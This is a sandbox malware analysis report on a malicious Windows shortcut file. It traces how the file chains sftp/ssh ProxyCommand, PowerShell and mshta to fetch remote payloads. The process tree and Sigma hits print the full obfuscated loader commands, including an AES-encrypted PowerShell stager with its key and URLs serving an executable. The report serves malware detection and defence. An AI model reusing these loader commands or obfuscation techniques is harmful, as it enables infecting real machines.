Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ei0woJS3Dy.lnk

Overview

General Information

Sample name:ei0woJS3Dy.lnk
renamed because original name is a hash value
Original sample name:68b851c1155b8b5b40728d9eba2bb219596a2cd955a1568553d3895e30ace0a0.lnk.d.lnk
Analysis ID:1576537
MD5:00cf9fd36c2868c46213b30cbc0aec64
SHA1:f3f2b029be1279c457e17a262265261d07f46582
SHA256:68b851c1155b8b5b40728d9eba2bb219596a2cd955a1568553d3895e30ace0a0
Tags:lnkstaticklipxuhaq-shopuser-JAMESWT_MHT
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
May use the Tor software to hide its network traffic
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Lolbin Ssh.exe Use As Proxy
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • sftp.exe (PID: 7188 cmdline: "C:\Windows\System32\OpenSSH\sftp.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')" . MD5: 72C41AA478CA868F95AD0936AF65818A)
    • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ssh.exe (PID: 7504 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
      • powershell.exe (PID: 7548 cmdline: powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']') MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 7928 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://static.klipxuhaq.shop/BUX6P.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • mshta.exe (PID: 6252 cmdline: "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
            • powershell.exe (PID: 8052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257) MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • Acrobat.exe (PID: 2636 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Mcyga.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
                • AcroCEF.exe (PID: 3208 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                  • AcroCEF.exe (PID: 2264 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1632,i,3400074222581117938,16656895389313698279,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • bdd.exe (PID: 8788 cmdline: "C:\Users\user\AppData\Roaming\bdd.exe" MD5: 1B4971205E6226DF6B9B11527F70A14F)
  • svchost.exe (PID: 4284 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 8052INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xfa284:$b1: ::WriteAllBytes(
  • 0xfad1b:$b1: ::WriteAllBytes(
  • 0x16f4f:$s1: -join
  • 0x176ec:$s1: -join
  • 0x35fd0:$s1: -join
  • 0x37812:$s1: -join
  • 0x448f2:$s1: -join
  • 0x46413:$s1: -join
  • 0x4659f:$s1: -join
  • 0x4a84c:$s1: -join
  • 0xfa338:$s1: -join
  • 0xfadcf:$s1: -join
  • 0x110d74:$s1: -join
  • 0x20a446:$s1: -join
  • 0x2135f9:$s1: -join
  • 0x2227d6:$s1: -join
  • 0x222811:$s1: -join
  • 0x2228d8:$s1: -join
  • 0x222906:$s1: -join
  • 0x222ac2:$s1: -join
  • 0x222ae5:$s1: -join

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://static.klipxuhaq.shop/BUX6P.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7928, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4, ProcessId: 6252, ProcessName: mshta.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp, CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp, CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\sftp.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')" ., ParentImage: C:\Windows\System32\OpenSSH\sftp.exe, ParentProcessId: 7188, ParentProcessName: sftp.exe, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp, ProcessId: 7504, ProcessName: ssh.exe
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8052, TargetFilename: C:\Users\user\AppData\Roaming\bdd.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']'), CommandLine: powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp, ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 7504, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']'), ProcessId: 7548, ProcessName: powershell.exe
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4284, ProcessName: svchost.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-17T08:38:25.141520+010020197142Potentially Bad Traffic192.168.2.1049713172.67.140.151443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://denek.local-wanderer.shopAvira URL Cloud: Label: malware
Source: https://denek.local-wanderer.shop/bdd.exeAvira URL Cloud: Label: malware
Source: http://denek.local-wanderer.shopAvira URL Cloud: Label: malware
Source: https://denek.local-wanderer.shop/bdd.exepAvira URL Cloud: Label: malware
Source: https://denek.local-wanderer.shop/bdd.exe~Avira URL Cloud: Label: malware
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.10:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.245.211.225:443 -> 192.168.2.10:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.140.151:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: Binary string: ntdll.pdb source: bdd.exe, 00000012.00000002.1802179098.0000000006316000.00000004.00000020.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1810507895.00000000069C0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: bdd.exe, 00000012.00000002.1802179098.0000000006316000.00000004.00000020.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.1810507895.00000000069C0000.00000004.00000800.00020000.00000000.sdmp
Source: global trafficHTTP traffic detected: GET /Mcyga.pdf HTTP/1.1Host: qu.axConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bdd.exe HTTP/1.1Host: denek.local-wanderer.shopConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.10:49713 -> 172.67.140.151:443
